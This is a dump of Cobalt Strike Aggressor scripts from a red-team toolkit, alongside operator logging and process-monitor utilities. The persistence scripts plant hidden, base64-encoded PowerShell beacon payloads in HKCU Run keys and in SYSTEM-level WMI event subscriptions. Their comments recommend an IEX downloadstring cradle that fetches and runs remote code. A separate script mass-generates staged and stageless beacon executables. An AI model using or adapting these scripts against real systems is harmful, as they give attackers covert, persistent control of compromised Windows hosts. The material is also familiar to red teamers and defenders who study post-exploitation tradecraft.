45 | timestamp = cmd_info.split("|")[1]
46 | date = str(timestamp.split(" ")[0])
47 |
48 | cmd = line.split(">")[1:]
49 | table = """
50 |
51 | | %s |
52 | %s |
53 | %s |
54 | %s |
55 | %s |
56 | %s |
57 | %s |
58 | Log Output |
59 |
60 | """ % (operator_name,ip,hostname,user,pid,timestamp,str(' '.join(cmd)),beacon_path,date,ip,hostname)
61 | log_file.write(table)
62 | log_file.write("""
63 |
64 | """ + str(num) + """ Log Entries
65 |
66 |
67 |
68 | """)
69 | log_file.close()
70 |
--------------------------------------------------------------------------------
/Persistence/HKCURunKeyPSRegistryPersist.cna:
--------------------------------------------------------------------------------
1 | #HKCU Run Key Registry PowerShell Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
4 | #Big thanks to @christruncer and @merrillmatt011 for the help and code snippets
5 | #Fileless Registry Persistence using PowerShell
6 |
7 | sub payloadgenerate {
8 | foreach $name (listeners()) {
9 | $original_listener = $name;
10 | $listener_name = lc($name);
11 | if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
12 | $data = artifact($original_listener, "powershell");
13 | return base64_encode($data);
14 | }
15 | }
16 | }
17 |
18 | sub persistRegistryPowerShell {
19 | $bid = $1;
20 | $dialog = dialog("HKCU Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
21 | if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
22 | berror($bid, "\c4Please enter valid Registry Key Names.");
23 | break;
24 | }
25 | else {
26 | $data = payloadgenerate($bid);
27 | $powershellcmd = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
28 | bpowerpick!($bid, $powershellcmd);
29 | blog($bid, "\cBSetting the first HKCU Run Key Value as '".$3['keyname']."'...");
30 | $powershellcmd1 = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
31 | bpowerpick!($bid, $powershellcmd1);
32 | blog($bid, "\cBSetting the second HKCU Run Key Value as '".$3['keyname1']."'...");
33 | blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
34 | $powershellcmd2 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
35 | bpowerpick!($bid, $powershellcmd2);
36 | $powershellcmd3 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
37 | bpowerpick!($bid, $powershellcmd3);
38 | }
39 | }));
40 |
41 | dialog_description($dialog, "HKCU Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon.");
42 |
43 | drow_text($dialog, "keyname", "Registry Key Name for Payload:");
44 | drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");
45 |
46 | dbutton_action($dialog, "Create");
47 | dialog_show($dialog);
48 |
49 | }
50 |
51 | popup beacon_bottom {
52 | item "HKCU Run Key Registry PowerShell Persistence" {
53 | persistRegistryPowerShell($1);
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/Persistence/README.md:
--------------------------------------------------------------------------------
1 | # Persistence
2 |
3 | **Persistence Aggressor Scripts for Cobalt Strike 3.0+**
4 |
5 | * Persistence_Menu.cna
6 |
7 | * Includes all scripts into one beacon menu
8 |
9 | * UserSchtasksPersist.cna
10 |
11 | * User Schtasks Persistence that runs as current user for the selected beacon
12 |
13 | * Meant for quick user level persistence upon initial access
14 |
15 | * Thanks to @noone and bluescreenofjeff for assistance
16 |
17 | 
18 |
19 | * ServiceEXEPersist.cna
20 |
21 | * Admin Level Custom Service EXE Persistence
22 |
23 | * Runs as elevated user/SYSTEM for the selected beacon
24 |
25 | 
26 |
27 | * WMICEventPersist.cna
28 |
29 | * Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon
30 |
31 | * Very syntax heavy, Test first before using on live targets
32 |
33 | 
34 |
35 | * WMIEventPersist.cna
36 |
37 | * Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon
38 |
39 | * Very syntax heavy, Test first before using on live targets
40 |
41 | 
42 |
43 | * StartupGPOPersist.cna
44 |
45 | * Generates a Local GPO Entry in psscripts.ini to call a .ps1 script file for persistence on selected beacon
46 |
47 | * Calls back as SYSTEM
48 |
49 | * Check permissions with GPO Enumeration (Successful GroupPolicy Directory Listing) first before executing
50 |
51 | * Beacon execution will cause winlogon.exe to hang and the end user can't login. Once the new beacon checks in inject into another process and kill the original. Update to come out soon.
52 |
53 | 
54 |
55 | * RegistryPersist.cna
56 |
57 | * Creates a Custom Registry Key, Value, Type, and Payload Location based on user input for selected beacon
58 |
59 | 
60 |
61 | * HKCURunKeyPSRegistryPersist.cna
62 |
63 | * Creates two Custom Registry Run Key entries in HKCU
64 |
65 | * The Payload is a base64 encoded powershell payload based off your HTTP/HTTPS listener
66 |
67 | 
68 |
69 | * Bitsadmin.cna
70 |
71 | * Creates a bitsadmin job that executes on reboot
72 |
73 | * Currently works on Windows 7, 8, Server 2008, Server 2012
74 |
75 | 
76 |
--------------------------------------------------------------------------------
/Persistence/WMICEventPersist.cna:
--------------------------------------------------------------------------------
1 | #Permanent WMI Event using WMIC Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon
4 | #Very syntax heavy, Test first before using on live targets
5 |
6 | sub persistwmieventwmic {
7 | $bid = $1;
8 | $dialog = dialog("Permanent WMI Event using WMIC Persistence", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", eventconsumer => "CommandLineEventConsumer Name..(Must be different from __EventFilter Name)", commandline => "CommandLineTemplate Syntax..(powershell.exe -w hidden -enc)", payloadfile => "Encoded Payload String.."), lambda({
9 | if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['eventconsumer']" ismatch 'CommandLineEventConsumer Name..(Must be different from __EventFilter Name)' || "$3['commandline']" ismatch 'CommandLineTemplate Syntax..(powershell.exe -w hidden)' || "$3['payloadfile']" ismatch 'Select Encoded Payload..') {
10 | berror($bid, "\c4Please enter a valid Custom __EventFilter Name, Event Query, CommandLineEventConsumer Name, Command Line Options, and the Encoded Payload File.");
11 | break;
12 | }
13 | else {
14 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="'.$3['eventfilter'].'", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="'.$3['eventquery'].'"');
15 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="'.$3['eventconsumer'].'", CommandLineTemplate="'.$3['commandline']." ".split("/",$3['payloadfile'])[-1].'"');
16 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"'.$3['eventfilter'].'\"", Consumer="CommandLineEventConsumer.Name=\"'.$3['eventconsumer'].'\""');
17 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list');
18 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list');
19 | bpowerpick($bid, 'wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list');
20 | }
21 | }));
22 | dialog_description($dialog, "Generates a Custom WMI Event using WMIC for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload must include IEX ((new-object new.webclient).downloadstring(http://yourdomain/payload.txt)) Utilize the following command to encode the payload correctly: cat payload.txt | iconv --to-code=UTF-16LE | base64** ");
23 |
24 | #base 64 encode IEX of the powershell one liner
25 | #cat payload.txt | iconv --to-code=UTF-16LE | base64
26 |
27 | drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
28 | drow_text($dialog, "eventquery", "Custom Event Query:");
29 | drow_text($dialog, "eventconsumer", "Custom CommandLineEventConsumer Name:");
30 | drow_text($dialog, "commandline", "Custom Command Line Options:");
31 | drow_text($dialog, "payloadfile", "Custom Encoded Payload String:");
32 |
33 | dbutton_action($dialog, "Create");
34 | dialog_show($dialog);
35 |
36 | }
37 |
38 | popup beacon_bottom {
39 | item "&Permanent WMI Event using WMIC Persistence" {
40 | local('$bid');
41 | foreach $bid ($1) {
42 | if (-isadmin $bid) {
43 | persistwmieventwmic($bid);
44 | }
45 | else {
46 | berror($1, "\c4Persistence Requires Admin Level Privileges");
47 | }
48 | }
49 | }
50 | }
51 |
--------------------------------------------------------------------------------
/Persistence/WMIEventPersist.cna:
--------------------------------------------------------------------------------
1 | #Permanent WMI Event using PowerShell Persistence
2 | #Author: @r3dQu1nn
3 | #Generates a Custom WMI Event using Powershell for SYSTEM Level persistence on selected beacon
4 | #Very syntax heavy, Test first before using on live targets
5 | #Sample Queries:
6 | ## User Logon:
7 | #SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2
8 | ## System UpTime (Reboot):
9 | #SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320
10 | #https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
11 | ##Recommended Encoded Payload:
12 | #base 64 encode IEX of the powershell one liner ex: IEX (new-object net.webclient).downloadstring('http://10.1.1.1/a') > payload.txt
13 | #cat payload.txt | iconv --to-code=UTF-16LE | base64 -w 0
14 |
15 | sub persistwmievent {
16 | $bid = $1;
17 | if (-is64 $bid) {
18 | $ExePath = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
19 | }
20 | else {
21 | $ExePath = "C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc";
22 | }
23 |
24 | $dialog = dialog("Permanent WMI Event Persistence with PowerShell", %(eventfilter => "__EventFilter Name..", eventquery => "Event Query...(Win32 Classes)", payloadstring => "Encoded Payload String.."), lambda({
25 | if ("$3['eventfilter']" ismatch '__EventFilter Name..' || "$3['eventquery']" ismatch 'Event Query...(Win32 Classes)' || "$3['payloadstring']" ismatch 'Encoded Payload String..') {
26 | berror($bid, "\c4Please enter a valid __EventFilter Name, Event Query, and an Encoded Payload String.");
27 | break;
28 | }
29 | else {
30 | $powershellcmd = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name=\"".$3['eventfilter']."\";EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"".$3['eventquery']."\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=\"".$3['eventfilter']."\";CommandLineTemplate =\"". $ExePath ." ".$3['payloadstring']."\"};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};";
31 | bpowerpick!($bid, $powershellcmd);
32 | blog($bid, 'Permanently Storing '.$3['eventfilter'].' in root\CimV2..');
33 | bpowerpick($bid, 'Get-WmiObject __eventFilter -namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
34 | bpowerpick($bid, 'Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name=\''.$3['eventfilter'].'\'"');
35 | }
36 | }));
37 | dialog_description($dialog, "Generates a Custom WMI Event using PowerShell for SYSTEM Level persistence on selected beacon. **Syntax is heavy, Test before using on live targets. Encoded Payload String must be converted to UTF-16LE, base64 encoded and under 1MB.**");
38 |
39 | drow_text($dialog, "eventfilter", "Custom __EventFilter Name:");
40 | drow_text($dialog, "eventquery", "Custom Event Query:");
41 | drow_text($dialog, "payloadstring", "Custom Encoded Payload String:");
42 |
43 | dbutton_action($dialog, "Create");
44 | dialog_show($dialog);
45 | }
46 |
47 | popup beacon_bottom {
48 | item "&Permanent WMI Event Persistence with PowerShell" {
49 | local('$bid');
50 | foreach $bid ($1) {
51 | if (-isadmin $bid) {
52 | persistwmievent($bid);
53 | }
54 | else {
55 | berror($1, "\c4Persistence Requires Admin Level Privileges");
56 | }
57 | }
58 | }
59 | }
60 |
--------------------------------------------------------------------------------
/ArtifactPayloadGenerator.cna:
--------------------------------------------------------------------------------
1 | #Automatic Artifact Payload Generator
2 | #Author: @r3dQu1nn
3 | #Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener
4 |
5 | #Custom Directory for Payloads
6 | mkdir("/opt/cobaltstrike/Staged_Payloads");
7 | mkdir("/opt/cobaltstrike/Stageless_Payloads");
8 |
9 | menubar("Payload Generator", "payloadgenerator");
10 | popup payloadgenerator {
11 | item "&Automatic Artifact Payload Generator" {
12 | prompt_confirm("Do you want to generate all the different types of Artifacts?", "Payload Generator Confirmation", {
13 | show_message("Generating Artifacts...");
14 | payloadgenerate();
15 | show_message("Check /opt/cobaltstrike/ for Staged and Stageless Payloads");
16 | });
17 | }
18 | }
19 |
20 | sub payloadgenerate {
21 | foreach $name (listeners_local()) {
22 | $original_listener = $name;
23 | $listener_name = lc($name);
24 | if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
25 |
26 | #Staged Payloads
27 | $data = artifact_stager($original_listener, "dll");
28 | $data2 = artifact_stager($original_listener, "exe");
29 | $data3 = artifact_stager($original_listener, "powershell");
30 | $data4 = artifact_stager($original_listener, "python");
31 | $data5 = artifact_stager($original_listener, "svcexe");
32 | $data6 = artifact_stager($original_listener, "vbscript");
33 | $data7 = artifact_stager($original_listener, "raw");
34 |
35 | #Write and Save Payloads
36 | $handle = openf(">/opt/cobaltstrike/Staged_Payloads/dllpayload.dll");
37 | writeb($handle, $data);
38 | closef($handle);
39 | $handle2 = openf(">/opt/cobaltstrike/Staged_Payloads/exepayload.exe");
40 | writeb($handle2, $data2);
41 | closef($handle2);
42 | $handle3 = openf(">/opt/cobaltstrike/Staged_Payloads/powershellpayload.ps1");
43 | writeb($handle3, $data3);
44 | closef($handle3);
45 | $handle4 = openf(">/opt/cobaltstrike/Staged_Payloads/pythonpayload.py");
46 | writeb($handle4, $data4);
47 | closef($handle4);
48 | $handle5 = openf(">/opt/cobaltstrike/Staged_Payloads/svcexepayload.exe");
49 | writeb($handle5, $data5);
50 | closef($handle5);
51 | $handle6 = openf(">/opt/cobaltstrike/Staged_Payloads/vbspayload.vbs");
52 | writeb($handle6, $data6);
53 | closef($handle6);
54 | $handle7 = openf(">/opt/cobaltstrike/Staged_Payloads/rawpayload.bin");
55 | writeb($handle7, $data7);
56 | closef($handle7);
57 |
58 | #Stageless Payloads
59 | $data8 = artifact_payload($original_listener, "dll", "x64");
60 | $data9 = artifact_payload($original_listener, "exe", "x86");
61 | $data10 = artifact_payload($original_listener, "python", "x86");
62 | $data11 = artifact_payload($original_listener, "powershell", "x86");
63 | $data12 = artifact_payload($original_listener, "raw", "x86");
64 | $data13 = artifact_payload($original_listener, "svcexe", "x86");
65 |
66 | #Write and Save Payloads
67 | $cradle = openf(">/opt/cobaltstrike/Stageless_Payloads/dllpayload.dll");
68 | writeb($cradle, $data8);
69 | closef($cradle);
70 | $cradle2 = openf(">/opt/cobaltstrike/Stageless_Payloads/exepayload.exe");
71 | writeb($cradle2, $data9);
72 | closef($cradle2);
73 | $cradle3 = openf(">/opt/cobaltstrike/Stageless_Payloads/powershellpayload.ps1");
74 | writeb($cradle3, $data11);
75 | closef($cradle3);
76 | $cradle4 = openf(">/opt/cobaltstrike/Stageless_Payloads/rawpayload.bin");
77 | writeb($cradle4, $data12);
78 | closef($cradle4);
79 | $cradle5 = openf(">/opt/cobaltstrike/Stageless_Payloads/pythonpayload.py");
80 | writeb($cradle5, $data10);
81 | closef($cradle5);
82 | $cradle6 = openf(">/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe");
83 | writeb($cradle6, $data13);
84 | closef($cradle6);
85 | }
86 | }
87 | }
88 |
--------------------------------------------------------------------------------
/logvis.cna:
--------------------------------------------------------------------------------
1 | # Beacon Command Log visualization
2 | # Author: @001SPARTaN (for @r3dqu1nn)
3 | # Tracks all your commands you executed on every beacon
4 |
5 | import ui.*;
6 | import table.*;
7 |
8 | import java.awt.*;
9 | import javax.swing.*;
10 | import javax.swing.table.*;
11 |
12 | global('$model $console $table');
13 |
14 | sub updateTable {
15 | fork({
16 | local('$entry');
17 |
18 | # Clear the model so we can put new stuff in it.
19 | [$model clear: 1024];
20 |
21 | foreach @entry (data_query('beaconlog')) {
22 | if (@entry[0] eq "beacon_input") {
23 | %modelEntry['operator'] = @entry[2];
24 | $bid = @entry[1];
25 | %modelEntry['ip'] = binfo($bid, "internal");
26 | %modelEntry['hostname'] = binfo($bid, "computer");
27 | %modelEntry['user'] = binfo($bid, "user");
28 | %modelEntry['pid'] = binfo($bid, "pid");
29 | %modelEntry['command'] = @entry[3];
30 | %modelEntry['timestamp'] = formatDate(@entry[4], "MMM dd HH:mm:ss z");
31 | # Add the new entry to $model
32 | [$model addEntry: %modelEntry];
33 | }
34 | }
35 | # Update with the new table
36 | [$model fireListeners];
37 | }, \$model);
38 | }
39 |
40 | # setupPopupMenu provided by Raphael Mudge
41 | # https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2
42 | sub setupPopupMenu {
43 | # we're using fork({}) to run this in a separate Aggressor Script environment.
44 | # This reduces deadlock potential due to Sleep's global interpreter lock
45 | #
46 | # this especially matters as our mouse listener will be fired for *everything*
47 | # to include mouse movements.
48 | fork({
49 | [$component addMouseListener: lambda({
50 | if ([$1 isPopupTrigger]) {
51 | # If right click, show popup
52 | show_popup($1, $name, $component);
53 | }
54 | }, \$component, \$name)];
55 | }, $component => $1, $name => $2, $model => $model, $table => $table);
56 | }
57 |
58 | sub createVisualization {
59 | this('$client');
60 | # GenericTableModel from table.*
61 | # Columns for each data model
62 | $model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16];
63 |
64 | # Create a table from the GenericTableModel
65 | $table = [new ATable: $model];
66 |
67 | # Controls how the column headers will sort the table
68 | $sorter = [new TableRowSorter: $model];
69 | [$sorter toggleSortOrder: 3];
70 |
71 | [$sorter setComparator: 0, {
72 | return $1 cmp $2;
73 | }];
74 |
75 | [$sorter setComparator: 1, {
76 | return $1 cmp $2;
77 | }];
78 |
79 | [$sorter setComparator: 2, {
80 | return $1 cmp $2;
81 | }];
82 |
83 | [$sorter setComparator: 3, {
84 | return $1 <=> $2;
85 | }];
86 |
87 | # Set $sorter as the row sorter for $table
88 | [$table setRowSorter: $sorter];
89 |
90 | # Create a split pane (divider you can drag around)
91 | $content = [new JScrollPane: $table];
92 |
93 | # Set popup menu for the table
94 | setupPopupMenu($table, "command_log");
95 |
96 | updateTable();
97 |
98 | # Register the visualization with CS
99 | addVisualization("Beacon Command Log", $content);
100 | return $content;
101 | }
102 |
103 | popup command_log {
104 | item "Copy" {
105 | println("Right click captured!");
106 | $selected = "";
107 | foreach $row ([$table getSelectedRows]) {
108 | # operator [ip_hostname] user/proc | timestamp> command
109 | $operator = [$model getValueAt: $row, 0];
110 | $ip = [$model getValueAt: $row, 1];
111 | $hostname = [$model getValueAt: $row, 2];
112 | $user = [$model getValueAt: $row, 3];
113 | $proc = [$model getValueAt: $row, 4];
114 | $time = [$model getValueAt: $row, 6];
115 | $command = [$model getValueAt: $row, 5];
116 |
117 | $selected .= "$operator \[$ip\_$hostname\] $user\/$proc | $time\> $command\n";
118 | }
119 | add_to_clipboard($selected);
120 | }
121 | }
122 |
123 | popup view {
124 | item "Command Log" {
125 | # Show the visualization
126 | addTab("Beacon Command Log", createVisualization(), "All commands you have executed in a beacon");
127 | }
128 | }
129 |
130 | on beacon_input {
131 | updateTable();
132 | }
133 |
--------------------------------------------------------------------------------
/ProcessMonitor.cna:
--------------------------------------------------------------------------------
1 | #Process Monitor
2 | #Author: @r3dQu1nn
3 | #Queries the processes at a set interval to see what processes have been started since that interval time
4 | #Thanks to @Alyssa (ramen0x3f) for the code snippets! Big thanks to @i_am_excite for the powershell code!
5 | #Big thanks to raffi for the on heartbeat help!
6 |
7 | #Global Variables
8 | $timer = "";
9 | $interval = "5m";
10 | include(script_resource("ProcessMonitor.ps1"));
11 |
12 | #Register Alias for Process Monitor
13 | beacon_command_register("ProcessMonitor",
14 | "Start/Stop and Change the Interval Time for Process Monitor",
15 | "Synopsis: ProcessMonitor [Start/Stop] [Time]\n" .
16 | "Options: 1m, 5m (default), 10m, 20m, 30m. If no time supplied, default of 5m is used.");
17 |
18 | #Process Monitor alias
19 | alias ProcessMonitor {
20 | if ( $2 eq 'Start' && $3 eq '1m' ) {
21 | if (-exists script_resource("ProcessMonitor.ps1")) {
22 | $bid = $1;
23 | $timer = "Start";
24 | $interval = "1m";
25 | blog($1, "\c9Process Monitor Started! Time Interval is set to " . $interval);
26 | blog($1, "\c4Run ProcessMonitor [Stop] to stop ProcessMonitor from running continuously.");
27 | blog($1, "\cBDepending on your sleep time, results might come before or after checkin.");
28 | bpowershell_import!($1, script_resource("ProcessMonitor.ps1"));
29 | bpowerpick!($1, 'Get-Proc 1');
30 | }
31 | else {
32 | $timer = "";
33 | $interval = "5m";
34 | berror($1, "\c4ProcessMonitor.ps1 does not exist!");
35 | show_message("ProcessMonitor.ps1 does not exist!");
36 | }
37 | }
38 | else if ( $2 eq 'Start' && $3 eq '5m' ) {
39 | if (-exists script_resource("ProcessMonitor.ps1")) {
40 | $bid = $1;
41 | $timer = "Start";
42 | $interval = "5m";
43 | blog($1, "\c9Process Monitor Started! Time Interval is set to " . $interval);
44 | blog($1, "\c4Run ProcessMonitor [Stop] to stop ProcessMonitor from running continuously.");
45 | blog($1, "\cBDepending on your sleep time, results might come before or after checkin.");
46 | bpowershell_import!($1, script_resource("ProcessMonitor.ps1"));
47 | bpowerpick!($1, 'Get-Proc 5');
48 | }
49 | else {
50 | $timer = "";
51 | $interval = "5m";
52 | berror($1, "\c4ProcessMonitor.ps1 does not exist!");
53 | show_message("ProcessMonitor.ps1 does not exist!");
54 | }
55 | }
56 | else if ( $2 eq 'Start' && $3 eq '10m' ) {
57 | if (-exists script_resource("ProcessMonitor.ps1")) {
58 | $bid = $1;
59 | $timer = "Start";
60 | $interval = "10m";
61 | blog($1, "\c9Process Monitor Started! Time Interval is set to " . $interval);
62 | blog($1, "\c4Run ProcessMonitor [Stop] to stop ProcessMonitor from running continuously.");
63 | blog($1, "\cBDepending on your sleep time, results might come before or after checkin.");
64 | bpowershell_import!($1, script_resource("ProcessMonitor.ps1"));
65 | bpowerpick!($1, 'Get-Proc 10');
66 | }
67 | else {
68 | $timer = "";
69 | $interval = "5m";
70 | berror($1, "\c4ProcessMonitor.ps1 does not exist!");
71 | show_message("ProcessMonitor.ps1 does not exist!");
72 | }
73 | }
74 | else if ( $2 eq 'Start' && $3 eq '20m' ) {
75 | if (-exists script_resource("ProcessMonitor.ps1")) {
76 | $bid = $1;
77 | $timer = "Start";
78 | $interval = "20m";
79 | blog($1, "\c9Process Monitor Started! Time Interval is set to " . $interval);
80 | blog($1, "\c4Run ProcessMonitor [Stop] to stop ProcessMonitor from running continuously.");
81 | blog($1, "\cBDepending on your sleep time, results might come before or after checkin.");
82 | bpowershell_import!($1, script_resource("ProcessMonitor.ps1"));
83 | bpowerpick!($1, 'Get-Proc 20');
84 | }
85 | else {
86 | $timer = "";
87 | $interval = "5m";
88 | berror($1, "\c4ProcessMonitor.ps1 does not exist!");
89 | show_message("ProcessMonitor.ps1 does not exist!");
90 | }
91 | }
92 | else if ( $2 eq 'Start' && $3 eq '30m' ) {
93 | if (-exists script_resource("ProcessMonitor.ps1")) {
94 | $bid = $1;
95 | $timer = "Start";
96 | $interval = "30m";
97 | blog($1, "\c9Process Monitor Started! Time Interval is set to " . $interval);
98 | blog($1, "\c4Run ProcessMonitor [Stop] to stop ProcessMonitor from running continuously.");
99 | blog($1, "\cBDepending on your sleep time, results might come before or after checkin.");
100 | bpowershell_import!($1, script_resource("ProcessMonitor.ps1"));
101 | bpowerpick!($1, 'Get-Proc 30');
102 | }
103 | else {
104 | $timer = "";
105 | $interval = "5m";
106 | berror($1, "\c4ProcessMonitor.ps1 does not exist!");
107 | show_message("ProcessMonitor.ps1 does not exist!");
108 | }
109 | }
110 | else if ( $2 eq 'Stop' ) {
111 | $timer = "Stop";
112 | $interval = "5m";
113 | blog($1, "\cBProcess Monitor has Stopped.");
114 | }
115 | else if ( $2 is $null ) {
116 | blog($1, "\c4Please provide 'Start' then a correct time interval to Start Process Monitor.");
117 | show_message("Please provide 'Start' then a correct time interval to Start Process Monitor.");
118 | }
119 | else if ( $3 != '1m' || $3 != '5m' || $3 != '10m' || $3 != '20m' || $3 != '30m' ) {
120 | blog($1, "\c4Please provide a correct time interval to Start Process Monitor.");
121 | show_message("Please provide a correct time interval to Start Process Monitor.");
122 | }
123 | else {
124 | $timer = "";
125 | $interval = "5m";
126 | }
127 | }
128 |
129 | #Process Monitor heartbeat checks
130 | on heartbeat_1m {
131 | if ( $timer eq 'Start' && $interval eq '1m' ) {
132 | bpowerpick!($bid, 'Get-Proc 1');
133 | }
134 | else if ( $timer eq 'Stop' ) {
135 | }
136 | else {
137 | }
138 | }
139 |
140 | on heartbeat_5m {
141 | if ( $timer eq 'Start' && $interval eq '5m' ) {
142 | bpowerpick!($bid, 'Get-Proc 5');
143 | }
144 | else if ( $timer eq 'Stop' ) {
145 | }
146 | else {
147 | }
148 | }
149 |
150 | on heartbeat_10m {
151 | if ( $timer eq 'Start' && $interval eq '10m' ) {
152 | bpowerpick!($bid, 'Get-Proc 10');
153 | }
154 | else if ( $timer eq 'Stop' ) {
155 | }
156 | else {
157 | }
158 | }
159 |
160 | on heartbeat_20m {
161 | if ( $timer eq 'Start' && $interval eq '20m' ) {
162 | bpowerpick!($bid, 'Get-Proc 20');
163 | }
164 | else if ( $timer eq 'Stop' ) {
165 | }
166 | else {
167 | }
168 | }
169 |
170 | on heartbeat_30m {
171 | if ( $timer eq 'Start' && $interval eq '30m' ) {
172 | bpowerpick!($bid, 'Get-Proc 30');
173 | }
174 | else if ( $timer eq 'Stop' ) {
175 | }
176 | else {
177 | }
178 | }
--------------------------------------------------------------------------------
/Logging/Logger.cna:
--------------------------------------------------------------------------------
1 | ## Logging only script with color coded process list
2 | # Need av_hips_executables.txt file in the same folder as this script.
3 | # To consolidate all logs please load this script, av_hips_executables.txt, and logs.py in /opt/cobaltstrike/ directory
4 | # Author: @r3dQu1nn
5 | ##
6 |
7 | #Custom Directories for logging
8 | mkdir("/opt/cobaltstrike/logs/operator_logs");
9 | mkdir("/opt/cobaltstrike/logs/operator_logs/beacon_output");
10 | mkdir("/opt/cobaltstrike/logs/operator_logs/operator_input");
11 |
12 | #Logging Menubar
13 | menubar("Export OP Logs", "exportlogs", 2);
14 | popup exportlogs {
15 | item "&Export OP Logs to HTML" {
16 | prompt_confirm("Do you want to consolidate all OP Logs? (Recommended for Post Operation)", "Log Consolidation", {
17 | show_message("Consolidating all OP Logs...");
18 | exec("python logs.py " . mynick());
19 | });
20 | }
21 | }
22 |
23 | global(@avlist);
24 |
25 | ## Set logging input/outputs
26 | set BEACON_INPUT {
27 | $bd = bdata($1);
28 | if ($2 eq mynick()) {
29 | return "\U" . mynick() . "\U" . "\U[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($4, 'yyyyMMMdd HH:mm:ss') . "\o> $3";
30 | } else {
31 | return "\U" . mynick() . "\U" . "$2 \U[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($4, 'yyyyMMMdd HH:mm:ss') ."\o> $3";
32 | }
33 | }
34 |
35 | on beacon_input {
36 | $bd = bdata($1);
37 | local('$in');
38 |
39 | if($2 eq mynick()) {
40 | $in = openf(">>/opt/cobaltstrike/logs/operator_logs/operator_input/" . formatDate($4, 'yyyyMMMdd') . "_" . mynick() . ".log");
41 |
42 | writeb($in, mynick() . "[" . $bd['internal'] . "_" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($4, 'yyyyMMMdd HH:mm:ss') . "> $3" . "\n");
43 |
44 | closef($in);
45 | }
46 | }
47 |
48 | on beacon_output {
49 | $bd = bdata($1);
50 | local('$out');
51 |
52 | $out = openf(">>/opt/cobaltstrike/logs/operator_logs/beacon_output/" . formatDate($3, 'yyyyMMMdd') . "_" . $bd['internal'] . "_" . $bd['computer'] . "_output.log");
53 |
54 | println($out, mynick() . "[" . $bd['computer'] . "]" . $bd['user'] . "/" . $bd['pid'] . "|" . formatDate($3, 'yyyyMMMdd HH:mm:ss') . "\n");
55 | println($out, "$2" . "\n");
56 |
57 | closef($out);
58 | }
59 |
